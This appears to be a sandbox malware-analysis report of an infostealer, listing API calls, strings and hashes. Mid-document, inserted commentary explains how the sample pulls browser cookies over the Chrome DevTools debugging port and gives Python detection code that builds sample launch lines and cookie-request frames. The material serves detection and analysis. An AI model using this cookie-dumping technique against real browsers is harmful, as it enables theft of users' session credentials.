                                    • lstrcat.KERNEL32(?,?), ref: 00F697B1
                                    • lstrcat.KERNEL32(?, --remote-debugging-port=9229 --profile-directory="), ref: 00F697C3
                                    • memset.MSVCRT ref: 00F697D7
                                      • Part of subcall function 00F83E70: lstrcpy.KERNEL32(00000000,00F8CFEC), ref: 00F83EA5
                                      • Part of subcall function 00F83E70: lstrcpy.KERNEL32(00000000,00A9A7D0), ref: 00F83ECF
                                      • Part of subcall function 00F83E70: GetSystemTime.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,?,?,00F6134E,?,0000001A), ref: 00F83ED9
                                    • wsprintfA.USER32 ref: 00F69806
                                    • OpenDesktopA.USER32(?,00000000,00000001,10000000), ref: 00F69827
                                    • CreateDesktopA.USER32(?,00000000,00000000,00000000,10000000,00000000), ref: 00F69844
                                      • Part of subcall function 00F846A0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 00F846B9
                                      • Part of subcall function 00F846A0: Process32First.KERNEL32(00000000,00000128), ref: 00F846C9
                                      • Part of subcall function 00F846A0: Process32Next.KERNEL32(00000000,00000128), ref: 00F846DB
                                      • Part of subcall function 00F846A0: StrCmpCA.SHLWAPI(?,?), ref: 00F846ED
                                      • Part of subcall function 00F846A0: OpenProcess.KERNEL32(00000001,00000000,?), ref: 00F84702
                                      • Part of subcall function 00F846A0: TerminateProcess.KERNEL32(00000000,00000000), ref: 00F84711
                                      • Part of subcall function 00F846A0: CloseHandle.KERNEL32(00000000), ref: 00F84718
                                      • Part of subcall function 00F846A0: Process32Next.KERNEL32(00000000,00000128), ref: 00F84726
                                      • Part of subcall function 00F846A0: CloseHandle.KERNEL32(00000000), ref: 00F84731
                                    • lstrcat.KERNEL32(00000000,?), ref: 00F69878
                                    • lstrcat.KERNEL32(00000000,?), ref: 00F69889
                                    • lstrcat.KERNEL32(00000000,00F94B60), ref: 00F6989B
                                    • memset.MSVCRT ref: 00F698AF
                                    • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 00F698D4
                                    • lstrcpy.KERNEL32(00000000,?), ref: 00F69903
                                    • StrStrA.SHLWAPI(00000000,00A9E160), ref: 00F69919
                                    • lstrcpyn.KERNEL32(011993D0,00000000,00000000), ref: 00F69938
                                    • lstrlen.KERNEL32(?), ref: 00F6994B
                                    • wsprintfA.USER32 ref: 00F6995B
                                    • lstrcpy.KERNEL32(?,00000000), ref: 00F69971
                                    • Sleep.KERNEL32(00001388), ref: 00F699E7
                                      • Part of subcall function 00F61530: lstrcpy.KERNEL32(00000000,?), ref: 00F61557
                                      • Part of subcall function 00F61530: lstrcpy.KERNEL32(00000000,?), ref: 00F61579
                                      • Part of subcall function 00F61530: lstrcpy.KERNEL32(00000000,?), ref: 00F6159B
                                      • Part of subcall function 00F61530: lstrcpy.KERNEL32(00000000,?), ref: 00F615FF
                                      • Part of subcall function 00F692B0: strlen.MSVCRT ref: 00F692E1
                                      • Part of subcall function 00F692B0: strlen.MSVCRT ref: 00F692FA
                                      • Part of subcall function 00F692B0: strlen.MSVCRT ref: 00F69399
                                      • Part of subcall function 00F692B0: strlen.MSVCRT ref: 00F693E6
                                      • Part of subcall function 00F84740: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000,?), ref: 00F84759
                                      • Part of subcall function 00F84740: Process32First.KERNEL32(00000000,00000128), ref: 00F84769
                                      • Part of subcall function 00F84740: Process32Next.KERNEL32(00000000,00000128), ref: 00F8477B
                                      • Part of subcall function 00F84740: OpenProcess.KERNEL32(00000001,00000000,?), ref: 00F8479C
                                      • Part of subcall function 00F84740: TerminateProcess.KERNEL32(00000000,00000000), ref: 00F847AB
                                      • Part of subcall function 00F84740: CloseHandle.KERNEL32(00000000), ref: 00F847B2
                                      • Part of subcall function 00F84740: Process32Next.KERNEL32(00000000,00000128), ref: 00F847C0
                                      • Part of subcall function 00F84740: CloseHandle.KERNEL32(00000000), ref: 00F847CB
                                    • CloseDesktop.USER32(?), ref: 00F69A1C
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1738932655.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$Process32lstrcat$Close$HandleNextProcessstrlen$CreateDesktopOpenmemset$FirstSnapshotTerminateToolhelp32wsprintf$FolderPathSleepSystemTimelstrcpynlstrlen
                                    • String ID: --remote-debugging-port=9229 --profile-directory="$%s%s$D
                                    • API String ID: 958055206-1862457068
                                    • Opcode ID: 56efd6e9e528c3eb5233f4fba2945757e7e95b3c4b9c5d6119afa4bb9136fcf8
                                    • Instruction ID: 0f87957bd08ee314cf2fe28ae49fe6d95f5908669f67c755f41dc594853dc392
                                    • Opcode Fuzzy Hash: 56efd6e9e528c3eb5233f4fba2945757e7e95b3c4b9c5d6119afa4bb9136fcf8
                                    • Instruction Fuzzy Hash: 9F919471900208ABDB64EFB4DC45FDE77B8EF48700F1440A9F619A7185DBB4AA84DBA0
                                    APIs
                                    • wsprintfA.USER32 ref: 00F7E22C
                                    • FindFirstFileA.KERNEL32(?,?), ref: 00F7E243
                                    • StrCmpCA.SHLWAPI(?,00F917A0), ref: 00F7E263
                                    • StrCmpCA.SHLWAPI(?,00F917A4), ref: 00F7E27D
                                    • wsprintfA.USER32 ref: 00F7E2A2
                                    • StrCmpCA.SHLWAPI(?,00F8CFEC), ref: 00F7E2B4
                                    • wsprintfA.USER32 ref: 00F7E2D1
                                      • Part of subcall function 00F7EDE0: lstrcpy.KERNEL32(00000000,?), ref: 00F7EE12
                                    • wsprintfA.USER32 ref: 00F7E2F0
                                    • PathMatchSpecA.SHLWAPI(?,?), ref: 00F7E304
                                    • lstrcat.KERNEL32(?,00A9E978), ref: 00F7E335
                                    • lstrcat.KERNEL32(?,00F91794), ref: 00F7E347
                                    • lstrcat.KERNEL32(?,?), ref: 00F7E358
                                    • lstrcat.KERNEL32(?,00F91794), ref: 00F7E36A
                                    • lstrcat.KERNEL32(?,?), ref: 00F7E37E
                                    • CopyFileA.KERNEL32(?,?,00000001), ref: 00F7E394
                                    • lstrcpy.KERNEL32(00000000,?), ref: 00F7E3D2
                                    • lstrcpy.KERNEL32(00000000,?), ref: 00F7E422
                                    • DeleteFileA.KERNEL32(?), ref: 00F7E45C
                                      • Part of subcall function 00F61530: lstrcpy.KERNEL32(00000000,?), ref: 00F61557
                                      • Part of subcall function 00F61530: lstrcpy.KERNEL32(00000000,?), ref: 00F61579
                                      • Part of subcall function 00F61530: lstrcpy.KERNEL32(00000000,?), ref: 00F6159B
                                      • Part of subcall function 00F61530: lstrcpy.KERNEL32(00000000,?), ref: 00F615FF
                                    • FindNextFileA.KERNEL32(00000000,?), ref: 00F7E49B
                                    • FindClose.KERNEL32(00000000), ref: 00F7E4AA
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1738932655.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
• Associated: 00000000.00000002.1738918094.0000000000F60000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1738932655.0000000000F97000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1738932655.0000000000FEE000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1738932655.0000000000FF6000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1738932655.000000000100F000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1738932655.0000000001198000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1739104230.00000000011AA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1739118707.00000000011AC000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1739118707.0000000001335000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1739118707.0000000001414000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1739118707.000000000143E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1739118707.0000000001448000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1739118707.0000000001455000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1739467945.0000000001456000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1739584107.00000000015F6000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1739601018.00000000015F7000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrcat$Filewsprintf$Find$CloseCopyDeleteFirstMatchNextPathSpec
                                    • String ID: %s\%s$%s\*
                                    • API String ID: 1375681507-2848263008
                                    • Opcode ID: d4394fa65fc7966a404daa887cce15e0347163adb3fe9b427aed05dac811443a
                                    • Instruction ID: 1838a093b9f26c4147a5f6f6648d4199e2bc28f47085d7cd83c5fc612305d96c
                                    • Opcode Fuzzy Hash: d4394fa65fc7966a404daa887cce15e0347163adb3fe9b427aed05dac811443a
                                    • Instruction Fuzzy Hash: A7819371D0021D9BCB24EFA4DD49EEE7778BF48304F0485A9B52A93141EB35EA84DFA1
                                    APIs
                                    • lstrcpy.KERNEL32(00000000,00F8CFEC), ref: 00F616E2
                                    • lstrcpy.KERNEL32(00000000,00F8CFEC), ref: 00F61719
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F6176C
                                    • lstrcat.KERNEL32(00000000), ref: 00F61776
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F617A2
                                    • lstrcpy.KERNEL32(00000000,?), ref: 00F618F3
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 00F618FE
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1738932655.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrcat
                                    • String ID: \*.*
                                    • API String ID: 2276651480-1173974218
                                    • Opcode ID: f350945ec51637b3fbfd708ca5855debb073e47359fa4dd3622a21e130b311ac
                                    • Instruction ID: 4f3bcbcc091c90b18e8ead81efe035be9b4be94dea8a3b3689c8f326ed93e55b
                                    • Opcode Fuzzy Hash: f350945ec51637b3fbfd708ca5855debb073e47359fa4dd3622a21e130b311ac
                                    • Instruction Fuzzy Hash: 1781AF31D1160A9BCB21EFA8DD99AAE77B8BF44314F0C0128F815A7245CB38DC41FBA1
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00F7DD45
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00F7DD4C
                                    • wsprintfA.USER32 ref: 00F7DD62
                                    • FindFirstFileA.KERNEL32(?,?), ref: 00F7DD79
                                    • StrCmpCA.SHLWAPI(?,00F917A0), ref: 00F7DD9C
                                    • StrCmpCA.SHLWAPI(?,00F917A4), ref: 00F7DDB6
                                    • wsprintfA.USER32 ref: 00F7DDD4
                                    • DeleteFileA.KERNEL32(?), ref: 00F7DE20
                                    • CopyFileA.KERNEL32(?,?,00000001), ref: 00F7DDED
                                      • Part of subcall function 00F61530: lstrcpy.KERNEL32(00000000,?), ref: 00F61557
                                      • Part of subcall function 00F61530: lstrcpy.KERNEL32(00000000,?), ref: 00F61579
                                      • Part of subcall function 00F61530: lstrcpy.KERNEL32(00000000,?), ref: 00F6159B
                                      • Part of subcall function 00F61530: lstrcpy.KERNEL32(00000000,?), ref: 00F615FF
                                      • Part of subcall function 00F7D980: memset.MSVCRT ref: 00F7D9A1
                                      • Part of subcall function 00F7D980: memset.MSVCRT ref: 00F7D9B3
                                      • Part of subcall function 00F7D980: SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 00F7D9DB
                                      • Part of subcall function 00F7D980: lstrcpy.KERNEL32(00000000,?), ref: 00F7DA0E
                                      • Part of subcall function 00F7D980: lstrcat.KERNEL32(?,00000000), ref: 00F7DA1C
                                      • Part of subcall function 00F7D980: lstrcat.KERNEL32(?,00A9E490), ref: 00F7DA36
                                      • Part of subcall function 00F7D980: lstrcat.KERNEL32(?,?), ref: 00F7DA4A
                                      • Part of subcall function 00F7D980: lstrcat.KERNEL32(?,00A9CFF8), ref: 00F7DA5E
                                      • Part of subcall function 00F7D980: lstrcpy.KERNEL32(00000000,?), ref: 00F7DA8E
                                      • Part of subcall function 00F7D980: GetFileAttributesA.KERNEL32(00000000), ref: 00F7DA95
                                    • FindNextFileA.KERNEL32(00000000,?), ref: 00F7DE2E
                                    • FindClose.KERNEL32(00000000), ref: 00F7DE3D
                                    • lstrcat.KERNEL32(?,00A9E978), ref: 00F7DE66
                                    • lstrcat.KERNEL32(?,00A9DDF0), ref: 00F7DE7A
                                    • lstrlen.KERNEL32(?), ref: 00F7DE84
                                    • lstrlen.KERNEL32(?), ref: 00F7DE92
                                    • lstrcpy.KERNEL32(00000000,?), ref: 00F7DED2
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1738932655.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrcat$File$Find$Heaplstrlenmemsetwsprintf$AllocateAttributesCloseCopyDeleteFirstFolderNextPathProcess
                                    • String ID: %s\%s$%s\*
                                    • API String ID: 4184593125-2848263008
                                    • Opcode ID: 2e608d8194acf0baf37f6d069a53401dee5db73e7302351edede77c70b91e9af
                                    • Instruction ID: 1de17d00b3ccb5d36a632b88f3ef8b77fc74e8ccec3c77b169a5e41fad699f12
                                    • Opcode Fuzzy Hash: 2e608d8194acf0baf37f6d069a53401dee5db73e7302351edede77c70b91e9af
                                    • Instruction Fuzzy Hash: 9D619571910208ABCB24EFB4DD49AEE77B9BF48310F0445A9F529D7244EB38AE84DF51
                                    APIs
                                    • wsprintfA.USER32 ref: 00F7D54D
                                    • FindFirstFileA.KERNEL32(?,?), ref: 00F7D564
                                    • StrCmpCA.SHLWAPI(?,00F917A0), ref: 00F7D584
                                    • StrCmpCA.SHLWAPI(?,00F917A4), ref: 00F7D59E
                                    • lstrcat.KERNEL32(?,00A9E978), ref: 00F7D5E3
                                    • lstrcat.KERNEL32(?,00A9E8B8), ref: 00F7D5F7
                                    • lstrcat.KERNEL32(?,?), ref: 00F7D60B
                                    • lstrcat.KERNEL32(?,?), ref: 00F7D61C
                                    • lstrcat.KERNEL32(?,00F91794), ref: 00F7D62E
                                    • lstrcat.KERNEL32(?,?), ref: 00F7D642
                                    • lstrcpy.KERNEL32(00000000,?), ref: 00F7D682
                                    • lstrcpy.KERNEL32(00000000,?), ref: 00F7D6D2
                                    • FindNextFileA.KERNEL32(00000000,?), ref: 00F7D737
                                    • FindClose.KERNEL32(00000000), ref: 00F7D746
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1738932655.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$Find$Filelstrcpy$CloseFirstNextwsprintf
                                    • String ID: %s\%s
                                    • API String ID: 50252434-4073750446
                                    • Opcode ID: 5b5963648e703efbfd17bf216443b2a4a7977cf14e73b66652daba3d9faccb2a
                                    • Instruction ID: 346b4500dec5d58a55a3c41d51850e6e5ba2b6345e36eee7965f64ae3521bb15
                                    • Opcode Fuzzy Hash: 5b5963648e703efbfd17bf216443b2a4a7977cf14e73b66652daba3d9faccb2a
                                    • Instruction Fuzzy Hash: 61618671D101199BCF24EFB4DC84ADE77B8BF48314F0485A9E56993240DB34AA85DF91
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1738932655.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Xinvalid_argumentstd::_
                                    • String ID: Connection: UpgradeUpgrade: websocketSec-WebSocket-Key: $Sec-WebSocket-Version: 13$ HTTP/1.1Host: $:$ws://${"id":1,"method":"Storage.getCookies"}
                                    • API String ID: 909987262-758292691
                                    • Opcode ID: 58550b661bc6c713aef0d0e8be65b92252c0aa342fe3393ebabfecbca6112430
                                    • Instruction ID: 61df9b21c778c320854e3fc5dd05f1b97c6598cfa01cdc4b97c1e07fb81fd456
                                    • Opcode Fuzzy Hash: 58550b661bc6c713aef0d0e8be65b92252c0aa342fe3393ebabfecbca6112430
                                    • Instruction Fuzzy Hash: D0A27871D012699FDF20DFA8C8907EDBBB6BF48310F1481AAD518A7241DB746E85EF90
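The String ID of this function is a hand-rolled WebSocket client: an HTTP/1.1 request carrying Host, Connection: Upgrade, Upgrade: websocket, Sec-WebSocket-Key and Sec-WebSocket-Version: 13, a ws:// target, and a first message of {"id":1,"method":"Storage.getCookies"}. Read together with the --remote-debugging-port=9229 --profile-directory=" string in the function at the top of this section (whose API list also includes CreateDesktop, Process32First/Next and TerminateProcess), this is the Chrome DevTools Protocol route to cookies: the browser is launched with its debugging port enabled and asked for the cookie jar over the loopback socket, and Storage.getCookies returns the profile's cookies in clear text. The Python below is an added example, not code from the report or from the sample, showing what a host agent or a loopback tap needs to catch it: the command-line check, the upgrade-request parser, and an RFC 6455 client-frame unmasker that pulls the CDP method out of the JSON. Network.getAllCookies, the /devtools/page/... request path and the chrome.exe path in the constructed inputs are my assumptions, not strings from the report.

```python
"""Decode the loopback DevTools traffic the strings above point to.

Added example, not from the report or the sample. It checks a browser
command line for the --remote-debugging-port/--profile-directory pair,
parses the HTTP/1.1 WebSocket upgrade, and unmasks client-to-server
frames (RFC 6455, section 5.3) to read the CDP "method" from the JSON.
Every input below is constructed; the /devtools/page path is an assumption.
"""
import json
import re
import struct

# Storage.getCookies is the method in the sample; Network.getAllCookies is the
# older equivalent and is added here as an assumption.
COOKIE_METHODS = {"Storage.getCookies", "Network.getAllCookies"}
PORT_RE = re.compile(r"--remote-debugging-port=(\d+)")
PROFILE_RE = re.compile(r'--profile-directory=("[^"]*"|\S+)')

def remote_debugging_launch(cmdline):
    """Debugging port if both switches are present, else None."""
    port = PORT_RE.search(cmdline)
    return int(port.group(1)) if port and PROFILE_RE.search(cmdline) else None

def parse_upgrade_request(raw):
    """Return (path, headers) of an HTTP/1.1 request; header names lower-cased."""
    head = raw.split(b"\r\n\r\n", 1)[0].decode("latin-1")
    request_line, *header_lines = head.split("\r\n")
    path = request_line.split(" ")[1]
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return path, headers

def is_websocket_upgrade(headers):
    return (headers.get("upgrade", "").lower() == "websocket"
            and "upgrade" in headers.get("connection", "").lower()
            and headers.get("sec-websocket-version") == "13"
            and "sec-websocket-key" in headers)

def build_client_text_frame(payload, mask_key):
    """Masked text frame as a client must send it (used to build the sample)."""
    header = bytes([0x81])  # FIN=1, opcode=1 (text)
    n = len(payload)
    if n < 126:
        header += bytes([0x80 | n])  # MASK bit + 7-bit length
    elif n < 0x10000:
        header += bytes([0x80 | 126]) + struct.pack(">H", n)
    else:
        header += bytes([0x80 | 127]) + struct.pack(">Q", n)
    return header + mask_key + bytes(b ^ mask_key[i % 4] for i, b in enumerate(payload))

def parse_frame(data):
    """Decode one frame into dict(fin, opcode, masked, payload), unmasking if needed."""
    b0, b1 = data[0], data[1]
    fin, opcode = bool(b0 & 0x80), b0 & 0x0F
    masked, n, pos = bool(b1 & 0x80), b1 & 0x7F, 2
    if n == 126:
        n, pos = struct.unpack(">H", data[2:4])[0], 4
    elif n == 127:
        n, pos = struct.unpack(">Q", data[2:10])[0], 10
    key = data[pos:pos + 4] if masked else b""
    pos += len(key)
    payload = data[pos:pos + n]
    if masked:
        payload = bytes(b ^ key[i % 4] for i, b in enumerate(payload))
    return {"fin": fin, "opcode": opcode, "masked": masked, "payload": payload}

def cookie_dump_method(frame):
    """CDP method name if this text frame asks for the cookie jar, else None."""
    if frame["opcode"] != 1:
        return None
    try:
        msg = json.loads(frame["payload"].decode("utf-8"))
    except (UnicodeDecodeError, ValueError):
        return None
    method = msg.get("method") if isinstance(msg, dict) else None
    return method if method in COOKIE_METHODS else None

# constructed inputs (paths are assumptions, not strings from the report)
CMDLINE = ('"C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe" '
           '--remote-debugging-port=9229 --profile-directory="Default"')
UPGRADE = (b"GET /devtools/page/ABC123 HTTP/1.1\r\n"
           b"Host: 127.0.0.1:9229\r\n"
           b"Connection: Upgrade\r\n"
           b"Upgrade: websocket\r\n"
           b"Sec-WebSocket-Key: dGhlIHNhbXBsZSBub25jZQ==\r\n"
           b"Sec-WebSocket-Version: 13\r\n\r\n")
CDP_PAYLOAD = b'{"id":1,"method":"Storage.getCookies"}'
CLIENT_FRAME = build_client_text_frame(CDP_PAYLOAD, b"\x12\x34\x56\x78")
```

Client-to-server frames are always masked on the wire, so a loopback capture cannot simply be searched for the method string; the frame has to be unmasked first, which is why parse_frame does that before cookie_dump_method looks at the JSON. On the host side, a browser command line carrying both switches is the cheap indicator, and the fixed port 9229 from the sample's own string makes it cheaper still.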
                                    APIs
                                    • lstrcpy.KERNEL32(00000000,00F8CFEC), ref: 00F723D4
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F723F7
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 00F72402
                                    • lstrlen.KERNEL32(\*.*), ref: 00F7240D
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F7242A
                                    • lstrcat.KERNEL32(00000000,\*.*), ref: 00F72436
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F7246A
                                    • FindFirstFileA.KERNEL32(00000000,?), ref: 00F72486
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1738932655.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                                    • String ID: \*.*
                                    • API String ID: 2567437900-1173974218
                                    • Opcode ID: e8ce03df8c63a1484b2e43acddcd2b73cd4b3e77594b3805d7ebd19ca7b4e034
                                    • Instruction ID: af7f00c8610e404b08a4f064da3da1d257c804af713b8a1d466a49b19463c333
                                    • Opcode Fuzzy Hash: e8ce03df8c63a1484b2e43acddcd2b73cd4b3e77594b3805d7ebd19ca7b4e034
                                    • Instruction Fuzzy Hash: 64419330512A098BCBB2EFA4DD85A9E73B4BF54314F085139F86A97212CB78DC41BB91
                                    APIs
                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 00F846B9
                                    • Process32First.KERNEL32(00000000,00000128), ref: 00F846C9
                                    • Process32Next.KERNEL32(00000000,00000128), ref: 00F846DB
                                    • StrCmpCA.SHLWAPI(?,?), ref: 00F846ED
                                    • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00F84702
                                    • TerminateProcess.KERNEL32(00000000,00000000), ref: 00F84711
                                    • CloseHandle.KERNEL32(00000000), ref: 00F84718
                                    • Process32Next.KERNEL32(00000000,00000128), ref: 00F84726
                                    • CloseHandle.KERNEL32(00000000), ref: 00F84731
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1738932655.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Process32$CloseHandleNextProcess$CreateFirstOpenSnapshotTerminateToolhelp32
                                    • String ID:
                                    • API String ID: 3836391474-0
                                    • Opcode ID: 5609e76f322dfd70c34efc91098d36ffa61c64ca092f75befcf7c2a26e9e4669
                                    • Instruction ID: f6c9adcf7da8264b6c11d4c1fa2329a237222ec22ee12d134221239829fa51e4
                                    • Opcode Fuzzy Hash: 5609e76f322dfd70c34efc91098d36ffa61c64ca092f75befcf7c2a26e9e4669
                                    • Instruction Fuzzy Hash: 2A01C4319012196BE7346B60DC8DFFE777CEB4AB15F0400A8FA25D1084EF74A9C09B61
                                    APIs
                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000), ref: 00F84628
                                    • Process32First.KERNEL32(00000000,00000128), ref: 00F84638
                                    • Process32Next.KERNEL32(00000000,00000128), ref: 00F8464A
                                    • StrCmpCA.SHLWAPI(?,steam.exe), ref: 00F84660
                                    • Process32Next.KERNEL32(00000000,00000128), ref: 00F84672
                                    • CloseHandle.KERNEL32(00000000), ref: 00F8467D
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1738932655.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                     • Associated: 00000000.00000002.1738918094.0000000000F60000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1738932655.0000000000F97000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1738932655.0000000000FEE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1738932655.0000000000FF6000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1738932655.000000000100F000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1738932655.0000000001198000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739104230.00000000011AA000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739118707.00000000011AC000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739118707.0000000001335000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739118707.0000000001414000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739118707.000000000143E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739118707.0000000001448000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739118707.0000000001455000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739467945.0000000001456000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739584107.00000000015F6000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739601018.00000000015F7000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Process32$Next$CloseCreateFirstHandleSnapshotToolhelp32
                                    • String ID: steam.exe
                                    • API String ID: 2284531361-2826358650
                                    • Opcode ID: 0449b755421ed2bf7497ce1c2105ce7e89b24ccf25e9d5240135408902167dad
                                    • Instruction ID: d042cc8f4a5a1959b7aca3fdf7cbfe0b8a9a0240145e90fbdf55f1ce4034b4f1
                                    • Opcode Fuzzy Hash: 0449b755421ed2bf7497ce1c2105ce7e89b24ccf25e9d5240135408902167dad
                                    • Instruction Fuzzy Hash: 14014471A012195BE720AA649C49FEA776CEF09754F0401E5E928D1040EB7499949BD5
                                    APIs
                                    • lstrcpy.KERNEL32(00000000,00F8CFEC), ref: 00F74B51
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F74B74
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 00F74B7F
                                    • lstrlen.KERNEL32(00F94CA8), ref: 00F74B8A
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F74BA7
                                    • lstrcat.KERNEL32(00000000,00F94CA8), ref: 00F74BB3
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F74BDE
                                    • FindFirstFileA.KERNEL32(00000000,?), ref: 00F74BFA
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1738932655.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                     • Associated: 00000000.00000002.1738918094.0000000000F60000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1738932655.0000000000F97000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1738932655.0000000000FEE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1738932655.0000000000FF6000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1738932655.000000000100F000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1738932655.0000000001198000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739104230.00000000011AA000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739118707.00000000011AC000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739118707.0000000001335000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739118707.0000000001414000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739118707.000000000143E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739118707.0000000001448000.00000040.00000001.01000000.00000003.sdmp
